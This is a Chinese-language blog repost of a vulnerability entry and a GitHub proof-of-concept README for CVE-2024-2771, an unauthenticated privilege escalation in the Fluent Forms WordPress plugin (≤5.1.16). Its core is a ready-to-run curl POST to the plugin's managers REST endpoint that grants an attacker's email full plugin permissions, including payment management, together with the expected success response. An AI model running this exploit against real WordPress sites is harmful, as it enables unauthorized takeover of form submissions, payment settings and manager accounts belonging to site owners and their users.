Contact Form – Fluent Forms 权限提升漏洞

漏洞信息

漏洞名称: Contact Form – Fluent Forms 权限提升漏洞

漏洞编号:

  • CVE: CVE-2024-2771

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: Contact Form – Fluent Forms是一款WordPress插件,用于创建和管理联系表单、测验、调查以及拖拽式表单构建。该插件广泛应用于各类WordPress网站,提供用户友好的表单构建和管理功能。该插件在5.1.16及之前版本中存在一个权限提升漏洞,由于在/wp-json/fluentform/v1/managers REST API端点上缺少能力检查,使得未认证的攻击者能够授予用户Fluent Form管理权限,从而访问插件的所有设置和功能,甚至删除管理员账户。这一漏洞的技术根源在于对REST API端点的访问控制不足,未能验证请求者的身份和权限,导致未认证用户能够执行高权限操作。此漏洞的影响极为严重,攻击者无需任何认证即可利用此漏洞,可能导致网站被完全控制,包括表单数据的泄露、支付信息的篡改等,对网站的安全性和用户数据的保密性构成重大威胁。

产品厂商: Fluent Forms

产品名称: Contact Form – Fluent Forms

影响版本: version <= 5.1.16

来源: https://github.com/whale93/CVE-2024-2771-PoC

类型: CVE-2024:github search

仓库文件

  • README.md

来源概述

CVE-2024-2771-PoC

CVE-2024-2771 Proof-of-Concept

The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin’s settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.

Prerequisites

  • WordPress site with Contact Form – Fluent Forms ≤ 5.1.16 active.
  • Attacker can reach the site’s REST API (no authentication needed).

Exploit Command

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
## 1. Grant full Fluent Forms permissions to an arbitrary email
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
     -H "Content-Type: application/json" \
     -d '{
           "manager": {
             "email": "attacker@example.com",
             "permissions": [
               "fluentform_dashboard_access",
               "fluentform_forms_manager",
               "fluentform_entries_viewer",
               "fluentform_manage_entries",
               "fluentform_view_payments",
               "fluentform_manage_payments",
               "fluentform_settings_manager",
               "fluentform_full_access"
             ]
           }
         }'

Expected Response

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
HTTP/1.1 200 OK
{
  "message": "Manager has been saved.",
  "manager": {
    "id": 2,
    "email": "attacker@example.com",
    "permissions": [
      "fluentform_dashboard_access",
      "fluentform_forms_manager",
      "fluentform_entries_viewer",
      "fluentform_manage_entries",
      "fluentform_view_payments",
      "fluentform_manage_payments",
      "fluentform_settings_manager",
      "fluentform_full_access"
    ]
  }
}

Screenshot
Screenshot 2025-08-01 105801

Github Poc
#权限提升 #CVE-2024:github search
Contact Form – Fluent Forms 权限提升漏洞
http://example.com/2025/08/03/github_1660153936/
作者
lianccc
发布于
2025年8月3日
许可协议